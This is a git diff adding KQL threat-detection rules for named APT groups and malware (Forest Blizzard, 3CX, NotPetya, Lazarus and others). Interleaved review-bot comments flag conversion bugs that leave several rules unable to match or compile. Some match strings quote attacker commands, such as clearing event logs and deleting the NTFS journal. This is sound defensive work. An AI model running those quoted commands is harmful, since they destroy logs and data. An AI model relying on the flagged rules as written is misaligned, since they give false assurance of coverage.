--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/diamond_sleet_apt_scheduled_task_creation_registry.kql
@@ -0,0 +1,11 @@
+// Title: Diamond Sleet APT Scheduled Task Creation - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-24
+// Level: high
+// Description: Detects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*" and RegistryKey contains "Windows TeamCity Settings User Interface"
\ No newline at end of file
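Review bot: In the Diamond Sleet scheduled-task rule, `RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree*"` treats the `*` as a literal character, since KQL string operators have no glob syntax, so the predicate never matches and the whole rule is dead. The Sigma wildcard should be folded into a single substring test, `| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Windows TeamCity Settings User Interface"`. The FlowCloud registry rule later in this patch has the same trailing wildcard in `RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*"` and needs the same treatment; the converter appears to pass a trailing `*` through unchanged when the Sigma pattern also has a leading one.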
diff --git a/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
new file mode 100644
index 00000000..7c11ad3e
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/dll_names_used_by_svr_for_graphicalproton_backdoor.kql
@@ -0,0 +1,10 @@
+// Title: DLL Names Used By SVR For GraphicalProton Backdoor
+// Author: CISA
+// Date: 2023-12-18
+// Level: medium
+// Description: Hunts known SVR-specific DLL names.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001, detection.emerging-threats
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AclNumsInvertHost.dll" or FolderPath endswith "\\AddressResourcesSpec.dll" or FolderPath endswith "\\BlendMonitorStringBuild.dll" or FolderPath endswith "\\ChildPaletteConnected.dll" or FolderPath endswith "\\DeregisterSeekUsers.dll" or FolderPath endswith "\\HandleFrequencyAll.dll" or FolderPath endswith "\\HardSwapColor.dll" or FolderPath endswith "\\LengthInMemoryActivate.dll" or FolderPath endswith "\\ModeBitmapNumericAnimate.dll" or FolderPath endswith "\\ModeFolderSignMove.dll" or FolderPath endswith "\\ParametersNamesPopup.dll" or FolderPath endswith "\\PerformanceCaptionApi.dll" or FolderPath endswith "\\ScrollbarHandleGet.dll" or FolderPath endswith "\\UnregisterAncestorAppendAuto.dll" or FolderPath endswith "\\WowIcmpRemoveReg.dll"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql
new file mode 100644
index 00000000..df167168
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/equation_group_dll_u_export_function_load.kql
@@ -0,0 +1,12 @@
+// Title: Equation Group DLL_U Export Function Load
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-03-04
+// Level: critical
+// Description: Detects a specific export function name used by one of EquationGroup tools
+// MITRE Tactic: Defense Evasion
+// Tags: attack.g0020, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-export dll_u" or (ProcessCommandLine endswith ",dll_u" or ProcessCommandLine endswith " dll_u")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql
new file mode 100644
index 00000000..cd9f3032
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/evilnum_apt_golden_chickens_deployment_via_ocx_files.kql
@@ -0,0 +1,10 @@
+// Title: EvilNum APT Golden Chickens Deployment Via OCX Files
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-07-10
+// Level: critical
+// Description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "/s" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "\\AppData\\Roaming\\" and ProcessCommandLine contains ".ocx"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql
new file mode 100644
index 00000000..e4f65936
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql
@@ -0,0 +1,10 @@
+// Title: Exploit for CVE-2015-1641
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: critical
+// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\MicroScMgmt.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
new file mode 100644
index 00000000..7a0c8949
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
@@ -0,0 +1,14 @@
+// Title: FlowCloud Registry Markers
+// Author: NVISO
+// Date: 2020-06-09
+// Level: critical
+// Description: Detects FlowCloud malware registry markers from threat group TA410.
+The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" or RegistryKey contains "\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" or RegistryKey contains "\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" or RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
new file mode 100644
index 00000000..60558d63
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
@@ -0,0 +1,14 @@
+// Title: Forest Blizzard APT - File Creation Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the creation of specific files inside of ProgramData directory.
+These files were seen being created by Forest Blizzard as described by MSFT.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where ((FolderPath contains "\\prnms003.inf_" or FolderPath contains "\\prnms009.inf_") and (FolderPath startswith "C:\\ProgramData\\Microsoft\\v" or FolderPath startswith "C:\\ProgramData\\Adobe\\v" or FolderPath startswith "C:\\ProgramData\\Comms\\v" or FolderPath startswith "C:\\ProgramData\\Intel\\v" or FolderPath startswith "C:\\ProgramData\\Kaspersky Lab\\v" or FolderPath startswith "C:\\ProgramData\\Bitdefender\\v" or FolderPath startswith "C:\\ProgramData\\ESET\\v" or FolderPath startswith "C:\\ProgramData\\NVIDIA\\v" or FolderPath startswith "C:\\ProgramData\\UbiSoft\\v" or FolderPath startswith "C:\\ProgramData\\Steam\\v")) or (FolderPath startswith "C:\\ProgramData\\" and ((FolderPath endswith ".save" or FolderPath endswith "\\doit.bat" or FolderPath endswith "\\execute.bat" or FolderPath endswith "\\servtask.bat") or (FolderPath contains "\\wayzgoose" and FolderPath endswith ".dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
new file mode 100644
index 00000000..14293f5b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
@@ -0,0 +1,14 @@
+// Title: Forest Blizzard APT - JavaScript Constrained File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: medium
+// Description: Detects the creation of JavaScript files inside of the DriverStore directory.
+Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath endswith "\\.js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
new file mode 100644
index 00000000..4ffc2e1e
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
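Review bot: `FolderPath endswith "\\.js"` only matches a file whose name is literally `.js` (a backslash immediately followed by the extension), so the JavaScript constraints files this rule exists to catch, which have a real basename before `.js`, will never match. The suffix should be the bare extension: `| where FolderPath endswith ".js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"`. The stray `\\` looks like a regex-escape of the dot that was then re-escaped as a KQL string, which suggests the converter's `endswith` handling should be checked for the same artifact in other extension-only patterns.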
@@ -0,0 +1,12 @@
+// Title: Forest Blizzard APT - Process Creation Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the execution of specific processes and command line combination.
+These were seen being created by Forest Blizzard as described by MSFT.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where (SHA256 startswith "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 startswith "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5") or (ProcessCommandLine contains "Get-ChildItem" and ProcessCommandLine contains ".save" and ProcessCommandLine contains "Compress-Archive -DestinationPath C:\\ProgramData\\") or ((ProcessCommandLine contains "servtask.bat" or ProcessCommandLine contains "execute.bat" or ProcessCommandLine contains "doit.bat") and (ProcessCommandLine contains "Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "SYSTEM" and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") or ((ProcessCommandLine contains "Delete" and ProcessCommandLine contains "/F " and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
new file mode 100644
index 00000000..60139c6e
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\1.dll, DllRegisterServer" or ProcessCommandLine endswith " 1.dll, DllRegisterServer") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..a98cb4ca
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
@@ -0,0 +1,11 @@
+// Title: Kapeka Backdoor Execution Via RunDLL32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local") and ((ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1" and ProcessCommandLine contains " -d") or (ProcessCommandLine contains ".wll" and ProcessCommandLine endswith "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql
new file mode 100644
index 00000000..63635772
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql
@@ -0,0 +1,12 @@
+// Title: Lazarus APT DLL Sideloading Activity
+// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: high
+// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\colorcpl.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\colorui.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\tabcal.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\HID.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Oracle\\Java\\fixmapi.exe" and FolderPath =~ "C:\\ProgramData\\Oracle\\Java\\mapistub.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramShared\\PresentationHost.exe" and FolderPath =~ ":\\ProgramShared\\mscoree.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql
new file mode 100644
index 00000000..58cbc6eb
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql
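Review bot: The final clause `FolderPath =~ ":\\ProgramShared\\mscoree.dll"` is an exact (case-insensitive) comparison against a value that begins with a colon, which no FolderPath value does since the column carries the drive letter, so the PresentationHost/mscoree sideloading pair can never fire. The leading colon only makes sense as a drive-agnostic suffix, i.e. `FolderPath endswith ":\\ProgramShared\\mscoree.dll"`; the converter presumably mapped a Sigma `endswith` modifier to `=~` here. For consistency with that intent the companion `InitiatingProcessFolderPath =~ "C:\\ProgramShared\\PresentationHost.exe"` (and the other three `=~` pairs, which are hard-wired to `C:`) would be better expressed with `endswith` as well.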
@@ -0,0 +1,12 @@
+// Title: Lazarus System Binary Masquerading
+// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
+// Date: 2020-06-03
+// Level: high
+// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msdtc.exe" or FolderPath endswith "\\gpsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql
new file mode 100644
index 00000000..03e80c6b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql
@@ -0,0 +1,12 @@
+// Title: Malicious DLL Load By Compromised 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-31
+// Level: critical
+// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where (SHA256 startswith "7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896" or SHA256 startswith "11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03" or SHA256 startswith "F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952" or SHA256 startswith "8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423") or (SHA1 startswith "BF939C9C261D27EE7BB92325CC588624FCA75429" or SHA1 startswith "20D554A80D759C50D6537DD7097FED84DD258B3E" or SHA1 startswith "894E7D4FFD764BB458809C7F0643694B036EAD30" or SHA1 startswith "3B3E778B647371262120A523EB873C20BB82BEAF") or (MD5 startswith "74BC2D0B6680FAA1A5A76B27E5479CBC" or MD5 startswith "82187AD3F0C6C225E2FBA0C867280CC9" or MD5 startswith "11BC82A9BD8297BD0823BCE5D6202082" or MD5 startswith "7FAEA2B01796B80D180399040BB69835")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql
new file mode 100644
index 00000000..6f1cf2ee
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql
@@ -0,0 +1,10 @@
+// Title: NotPetya Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi
+// Date: 2019-01-16
+// Level: critical
+// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats
+
+DeviceProcessEvents
+| where "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" or ProcessCommandLine endswith ".dat #1" or ProcessCommandLine endswith ".zip.dll\",#1") and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine contains "wevtutil cl Application & fsutil usn deletejournal /D C:" or ProcessCommandLine contains "dllhost.dat %WINDIR%\\ransoms")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..9e970a18
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
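Review bot: `| where "\\perfc.dat" or (...)` starts with a bare string literal where KQL requires a boolean expression, so the query fails to compile and this critical-level rule is inert as committed. The field name was evidently lost in conversion (most likely a Sigma field with no mapping in the chosen backend); the source rule should be consulted, but from the description the intended test is almost certainly on the command line or image path, e.g. `| where ProcessCommandLine contains "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" ...`. A converter that ends up with a value and no field should refuse to write the file rather than emit a predicate that cannot parse.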
@@ -0,0 +1,11 @@
+// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-26
+// Level: high
+// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Installer\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf,") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".cpl\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".inf" or ProcessCommandLine endswith ".inf\"" or ProcessCommandLine endswith ".cpl'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".inf'"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql
new file mode 100644
index 00000000..aab412c6
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql
@@ -0,0 +1,10 @@
+// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
+// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-02
+// Level: medium
+// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "\\AppData\\Local\\" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains ",DllEntry"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql
new file mode 100644
index 00000000..8985cf3b
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Compromised 3CXDesktopApp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects execution of known compromised version of 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate usage of 3CXDesktopApp
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName =~ "3CXDesktopApp.exe" or FolderPath endswith "\\3CXDesktopApp.exe" or ProcessVersionInfoProductName =~ "3CX Desktop App") and ProcessVersionInfoProductVersion contains "18.12.") or ((SHA256 startswith "DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC" or SHA256 startswith "54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02" or SHA256 startswith "D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE" or SHA256 startswith "FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405" or SHA256 startswith "5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734" or SHA256 startswith "A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203" or SHA256 startswith "AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868" or SHA256 startswith "59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983") or (SHA1 startswith "480DC408EF50BE69EBCF84B95750F7E93A8A1859" or SHA1 startswith "3B43A5D8B83C637D00D769660D01333E88F5A187" or SHA1 startswith "6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA" or SHA1 startswith "E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1" or SHA1 startswith "8433A94AEDB6380AC8D4610AF643FB0E5220C5CB" or SHA1 startswith "413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5" or SHA1 startswith "BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA" or SHA1 startswith "BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E") or (MD5 startswith "BB915073385DD16A846DFA318AFA3C19" or MD5 startswith "08D79E1FFFA244CC0DC61F7D2036ACA9" or 
MD5 startswith "4965EDF659753E3C05D800C6C8A23A7A" or MD5 startswith "9833A4779B69B38E3E51F04E395674C6" or MD5 startswith "704DB9184700481A56E5100FB56496CE" or MD5 startswith "8EE6802F085F7A9DF7E0303E65722DC0" or MD5 startswith "F3D4144860CA10BA60F7EF4D176CC736" or MD5 startswith "0EEB1C0133EB4D571178B2D9D14CE3E9"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql
new file mode 100644
index 00000000..7e7e0e57
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential Compromised 3CXDesktopApp Update Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--update" and ProcessCommandLine contains "http" and ProcessCommandLine contains "/electron/update/win32/18.12") and FolderPath endswith "\\3CXDesktopApp\\app\\update.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql
new file mode 100644
index 00000000..68d1c51c
--- /dev/null
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_devil_bait_malware_reconnaissance.kql
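Review bot: The version selector `ProcessVersionInfoProductVersion contains "18.12."` in the first branch of the `| where` line (the line begins on the previous source line) fires on every 18.12 build of 3CXDesktopApp, not only the trojanized ones, so that branch is a vendor-line match rather than a compromise indicator and will alert on clean installs in that line — which is presumably why "Legitimate usage" is listed as a false positive. If the affected builds are confirmed (public reporting at the time named 18.12.407 and 18.12.416 for Windows; verify against the vendor advisory before changing), `ProcessVersionInfoProductVersion in~ ("18.12.407", "18.12.416")` keeps the hash-independent branch meaningful for hosts where hashes are missing. The three hash branches use `startswith` on full-length digests; `SHA256 in~ (…)`, `SHA1 in~ (…)` and `MD5 in~ (…)` express the exact match they intend and read as indicator lists rather than prefix tests.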
@@ -0,0 +1,12 @@
+// Title: Potential Devil Bait Malware Reconnaissance
+// Author: Nasreddine Bencherchali (Nextron Systems), NCSC (Idea)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects specific process behavior observed with Devil Bait samples
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "ipconfig\\s+/all" or (ProcessCommandLine contains "dir" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist")) and (ProcessCommandLine contains ">>%APPDATA%\\Microsoft\\" and (ProcessCommandLine endswith ".xml" or ProcessCommandLine endswith ".txt") and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\wscript.exe")
